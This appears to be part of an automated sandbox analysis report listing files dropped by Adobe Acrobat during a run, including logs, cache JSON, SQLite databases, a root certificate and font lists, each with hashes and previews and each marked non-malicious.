                                                                        SHA-512:735ED44126D172B9AA5E366E71942B5511F6FB65C18424717F8308E77A53884366C1B2291427364BF5060C0E49803C0CBF1E6E916ECE24AB490209FB97E325B8
                                                                        Malicious:false
                                                                        Preview:2024/12/17-02:38:26.961 1d20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:38:26.964 1d20 Recovering log #3.2024/12/17-02:38:26.965 1d20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.240645990743886
                                                                        Encrypted:false
                                                                        SSDEEP:6:7Cq2Pv2nKuAl9OmbnIFUt8OIZmw+OrBrkwOv2nKuAl9OmbjLJ:7Cv2HAahFUt8OI/+OrBr5bHAaSJ
                                                                        MD5:D1A03E101D6AB23ECED528A90AF211F4
                                                                        SHA1:12AD015F666CB3D0941CC75C9B111CE97596DAB2
                                                                        SHA-256:D2852477C26050142E648CE0BCD818663064D1EFF78CE9FBAC17730D94D9B07D
                                                                        SHA-512:735ED44126D172B9AA5E366E71942B5511F6FB65C18424717F8308E77A53884366C1B2291427364BF5060C0E49803C0CBF1E6E916ECE24AB490209FB97E325B8
                                                                        Malicious:false
                                                                        Preview:2024/12/17-02:38:26.961 1d20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:38:26.964 1d20 Recovering log #3.2024/12/17-02:38:26.965 1d20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):336
                                                                        Entropy (8bit):5.1607754011971325
                                                                        Encrypted:false
                                                                        SSDEEP:6:79cgyq2Pv2nKuAl9Ombzo2jMGIFUt8O9Sv/1Zmw+O9/RkwOv2nKuAl9Ombzo2jM4:79Tyv2HAa8uFUt8O9Sv9/+O9/R5bHAaU
                                                                        MD5:9F2012E8D710C979D1F63C5DA23798A3
                                                                        SHA1:69B57207D80AD3C9B571FBE79630A1E33D1B5EE9
                                                                        SHA-256:3B21F0583C8CEB36E147C0E1FFBB78C7183EDC0D937EA012C9EC5D9E45DEBA00
                                                                        SHA-512:D3EECE652459DE4F240D52627584E46876D6D50D9BA3D8CCD61848F01CE8F650D62A5CF764753AF9251E91152D3F456A396A26DB093AE3A46C136A1A3BEFB904
                                                                        Malicious:false
                                                                        Preview:2024/12/17-02:38:27.284 1de4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-02:38:27.287 1de4 Recovering log #3.2024/12/17-02:38:27.288 1de4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):336
                                                                        Entropy (8bit):5.1607754011971325
                                                                        Encrypted:false
                                                                        SSDEEP:6:79cgyq2Pv2nKuAl9Ombzo2jMGIFUt8O9Sv/1Zmw+O9/RkwOv2nKuAl9Ombzo2jM4:79Tyv2HAa8uFUt8O9Sv9/+O9/R5bHAaU
                                                                        MD5:9F2012E8D710C979D1F63C5DA23798A3
                                                                        SHA1:69B57207D80AD3C9B571FBE79630A1E33D1B5EE9
                                                                        SHA-256:3B21F0583C8CEB36E147C0E1FFBB78C7183EDC0D937EA012C9EC5D9E45DEBA00
                                                                        SHA-512:D3EECE652459DE4F240D52627584E46876D6D50D9BA3D8CCD61848F01CE8F650D62A5CF764753AF9251E91152D3F456A396A26DB093AE3A46C136A1A3BEFB904
                                                                        Malicious:false
                                                                        Preview:2024/12/17-02:38:27.284 1de4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-02:38:27.287 1de4 Recovering log #3.2024/12/17-02:38:27.288 1de4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\9c60ebd5-80fa-4b99-8f0f-34ebe62ca8c5.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):476
                                                                        Entropy (8bit):4.978384704520399
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqhsBdOg2HWcaq3QYiubPP7E4TX:Y2sRdsjdMHp3QYhbH7n7
                                                                        MD5:0BB1D655621946584C1044D6D845EBF9
                                                                        SHA1:80069D8FB965EEFD16E84A401AC4131370B24D7F
                                                                        SHA-256:19DF7452C43D58E03B4CC674F4C23B1B6C68AD380AB7F6CA935F41CA4E1AD6B9
                                                                        SHA-512:FFFAB6B25107D5C307EDCB8425DDE3A37DECDE65E7B50C88EF51EC101C9319F79F06A356F48D7E62CF30F961C99C9D38C0364918378A1AEAAEE3656BA6EDFD3F
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341068803250797","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":143527},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.12","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):476
                                                                        Entropy (8bit):4.978384704520399
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqhsBdOg2HWcaq3QYiubPP7E4TX:Y2sRdsjdMHp3QYhbH7n7
                                                                        MD5:0BB1D655621946584C1044D6D845EBF9
                                                                        SHA1:80069D8FB965EEFD16E84A401AC4131370B24D7F
                                                                        SHA-256:19DF7452C43D58E03B4CC674F4C23B1B6C68AD380AB7F6CA935F41CA4E1AD6B9
                                                                        SHA-512:FFFAB6B25107D5C307EDCB8425DDE3A37DECDE65E7B50C88EF51EC101C9319F79F06A356F48D7E62CF30F961C99C9D38C0364918378A1AEAAEE3656BA6EDFD3F
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341068803250797","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":143527},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.12","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF553192.TMP (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):476
                                                                        Entropy (8bit):4.978384704520399
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqhsBdOg2HWcaq3QYiubPP7E4TX:Y2sRdsjdMHp3QYhbH7n7
                                                                        MD5:0BB1D655621946584C1044D6D845EBF9
                                                                        SHA1:80069D8FB965EEFD16E84A401AC4131370B24D7F
                                                                        SHA-256:19DF7452C43D58E03B4CC674F4C23B1B6C68AD380AB7F6CA935F41CA4E1AD6B9
                                                                        SHA-512:FFFAB6B25107D5C307EDCB8425DDE3A37DECDE65E7B50C88EF51EC101C9319F79F06A356F48D7E62CF30F961C99C9D38C0364918378A1AEAAEE3656BA6EDFD3F
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341068803250797","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":143527},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.12","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d1859954-1c93-4497-ad21-6defede3c6c7.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:modified
                                                                        Size (bytes):476
                                                                        Entropy (8bit):4.964193764389803
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqZsBdOg2H9mOHAcaq3QYiubPP7E4TX:Y2sRdsfdMHj3QYhbH7n7
                                                                        MD5:6420C3AA88F85719FFFE2FD45EDA8002
                                                                        SHA1:2CD765E3ED1466BEDFBA6477D8065315BDE1768B
                                                                        SHA-256:9E247A052DC32C2B099CF718DC7D6C3AB6DC1392C92504E31A88529A27350649
                                                                        SHA-512:EAD95E056E408BD687588AB15961CFA6B62392DC97A8FE8756D15F9B0BB8522FB8BDBBF08BAAD3CDDBC99DD87F0A645B6AD8CC98F3BE34B5631C8CCEB8E673E5
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378981119023849","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":631451},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.12","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3878
                                                                        Entropy (8bit):5.212664347112404
                                                                        Encrypted:false
                                                                        SSDEEP:96:GQux1TtQoLOdBrjx5uaLOKhtr8OU8tZdUtFuHHoQH3mA1:zux1TNOdBrjxQIOK/4OvZdUPuHHoQH3J
                                                                        MD5:6C38B7453BD2EC0CFAD0496FC9DB4BD1
                                                                        SHA1:77600E16400FBDDA8DD2D5EAA58F03C51D43A9A0
                                                                        SHA-256:AA5E214F5C0BDCE82E46AC3DB8CCD42B14681E8AC914B3544BD58437730B472A
                                                                        SHA-512:78C92E7011C447C978C6E884A4647790A3A5623AD23CC607F990BB1B2A809CC2490F535565163F8C5763AE186DE6CF2F5AA3D3C817C510B956FD566075F6D740
                                                                        Malicious:false
                                                                        Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-7e305c39_d2cf_4529_a05a_c594b19b130d-https://rna-resource.acrobat.com/.08..ur................next-map-id.2.Snamespace-3b7a0125_ffe4_43e4_9267_9114e9bd4ef0-https://rna-v2-resource.acrobat.com/.1..kr................next-map-id.3.Snamespace-b5707108_0a77_4f86_8085_b3b780fa5fd7-https://rna-v2-resource.acrobat.com/.2a60.o................next-map-id.4.Pnamespace-706bf942_8f67_4abb_a866_2428106408be-https://rna-resource.acrobat.com/.3....^...............Pnamespace-7e305c39_d2cf_4529_a05a_c594b19b130d-https://rna-resource.acrobat.com/$...r................next-map-id.5.Snamespace-8636f107_899a_42b0_9217_ddfd773d1c84-https://rna-v2-resource.acrobat.com/.4..p.r................next-map-id.6.Snamespace-7b9f8588_400e_4560_9274_0b14323a49a1-https://rna-v2-resource.acrobat.com/.5]..ro................next-map-id.7.Pnamespace-c8af9c4a_d01c_48c1_9e5d_35b6c87a8d52-https://rna-resource.acrobat.com/.6...uo..............

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):324
                                                                        Entropy (8bit):5.186874074930262
                                                                        Encrypted:false
                                                                        SSDEEP:6:7G5Ygyq2Pv2nKuAl9OmbzNMxIFUt8Ojn1Zmw+OjXuRkwOv2nKuAl9OmbzNMFLJ:7G5Ygyv2HAa8jFUt8OZ/+OruR5bHAa8E
                                                                        MD5:9E849F18DE0875714EBDD6EEB911542C
                                                                        SHA1:FF8F6565F86063795914B77FC8302876E5E7CBD2
                                                                        SHA-256:9B14D5BF9547EE87EF834771F0B83587F157781CDA4D8C5356D0E9DEEDA3E80C
                                                                        SHA-512:55874EE4CB568B083D3BCA153ED48EEAE5CF5A473C25FAF47B0CB4F238964D6B3D4991580E99344FEB937255B691890E2AE5226C15C2ED47D3FFB19BA1B8B221
                                                                        Malicious:false
                                                                        Preview:2024/12/17-02:38:27.397 1de4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-02:38:27.402 1de4 Recovering log #3.2024/12/17-02:38:27.403 1de4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):324
                                                                        Entropy (8bit):5.186874074930262
                                                                        Encrypted:false
                                                                        SSDEEP:6:7G5Ygyq2Pv2nKuAl9OmbzNMxIFUt8Ojn1Zmw+OjXuRkwOv2nKuAl9OmbzNMFLJ:7G5Ygyv2HAa8jFUt8OZ/+OruR5bHAa8E
                                                                        MD5:9E849F18DE0875714EBDD6EEB911542C
                                                                        SHA1:FF8F6565F86063795914B77FC8302876E5E7CBD2
                                                                        SHA-256:9B14D5BF9547EE87EF834771F0B83587F157781CDA4D8C5356D0E9DEEDA3E80C
                                                                        SHA-512:55874EE4CB568B083D3BCA153ED48EEAE5CF5A473C25FAF47B0CB4F238964D6B3D4991580E99344FEB937255B691890E2AE5226C15C2ED47D3FFB19BA1B8B221
                                                                        Malicious:false
                                                                        Preview:2024/12/17-02:38:27.397 1de4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-02:38:27.402 1de4 Recovering log #3.2024/12/17-02:38:27.403 1de4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241217073831Z-165.bmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                        Category:dropped
                                                                        Size (bytes):65110
                                                                        Entropy (8bit):0.9206466611022782
                                                                        Encrypted:false
                                                                        SSDEEP:96:FMM8vQ8MMMMEMMMMHMTel8ikV1lM9BM3YIQYZOzMVMIOBMMjXMLM4OM76MMMMMMQ:8BSOb
                                                                        MD5:014B2B0028CE183DA972335E68A9E6B4
                                                                        SHA1:065580B02404C4F7DDBDCF62C6624D7D42EA986F
                                                                        SHA-256:D444759DBF2ACF2C384E91624AFD86270C4E63C00A509E2366DD695DE831AD68
                                                                        SHA-512:96B179D6357443E5DBC430FEFE2E0426D6A67D53E20E982F46949500B2FA8ED62D1F60925A9987D9238609D79E8B7F04A08CDF38FA840149BD757C24A8844FD3
                                                                        Malicious:false
                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):4.438740719104499
                                                                        Encrypted:false
                                                                        SSDEEP:384:ye1ci5GCiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:SyurVgazUpUTTGt
                                                                        MD5:7865F6DF962D575A02E8DF225A27EE51
                                                                        SHA1:D045691019A25BD2E3474144FAA361127C6EA781
                                                                        SHA-256:35D5F93AFF03BAEB5E534F54E92A0CC7FD0F4CFA826642DFE6F663BC61109977
                                                                        SHA-512:017DCCA1600D98C0C7CF6B755A8548F70B02CFDF6D5D77344053F78B34413D802594EA242DD9F1B4ABDB4C2F5F5D93D321010840F9C04463880207CC8F811990
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):3.7704667205658517
                                                                        Encrypted:false
                                                                        SSDEEP:48:7MIgJioyVTioyHcoy1C7oy16oy1RKOioy1noy1AYoy1Wioy1oioykioyBoy1noy2:7AJuTsAXjBiob9IVXEBodRBkx
                                                                        MD5:30524CE611C42842809959F2FEDD1051
                                                                        SHA1:321BCE765D7E9F09A3FAA43B457C393E5DC1ED6B
                                                                        SHA-256:855CE4D33784F29FFFE22E2836D127FC5D63A88860F693BA94EB08DC32D6EBD1
                                                                        SHA-512:A539687A8B67522F8F6D970A26785EBC40D799E7046244787557B7111E158E34F1674C43643C5BE51732CDB6981B84CDB13A44DB30EFB8AD32620AF6810474BD
                                                                        Malicious:false
                                                                        Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Certificate, Version=3
                                                                        Category:dropped
                                                                        Size (bytes):1391
                                                                        Entropy (8bit):7.705940075877404
                                                                        Encrypted:false
                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                        Malicious:false
                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):192
                                                                        Entropy (8bit):2.7673182398396405
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFklomefllXlE/HT8kBzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKxm/T8YdNMa8RdWBwRd
                                                                        MD5:2DF0E2D99CD7BB59820AADC0EA95CD85
                                                                        SHA1:156846F34597E4750FA3F9A8706252F2C401333C
                                                                        SHA-256:C7D8A678784461563CEE2B35E5A85B86E459B85858F2B52DFEDA5ED2A6BD162B
                                                                        SHA-512:0F3CEC9432B911F662885BB76C152930A429A9B1C316C82E74DD7B4B32755B9BE902AC7688263F722C1DF186E9BC9BE3CFEBB46C66425083DDCCE28B3ED356EF
                                                                        Malicious:false
                                                                        Preview:p...... ..........J.VP..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PostScript document text
                                                                        Category:dropped
                                                                        Size (bytes):1233
                                                                        Entropy (8bit):5.233980037532449
                                                                        Encrypted:false
                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                        Malicious:false
                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7276

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PostScript document text
                                                                        Category:dropped
                                                                        Size (bytes):1233
                                                                        Entropy (8bit):5.233980037532449
                                                                        Encrypted:false
                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                        Malicious:false
                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PostScript document text
                                                                        Category:dropped
                                                                        Size (bytes):1233
                                                                        Entropy (8bit):5.233980037532449
                                                                        Encrypted:false
                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                        Malicious:false
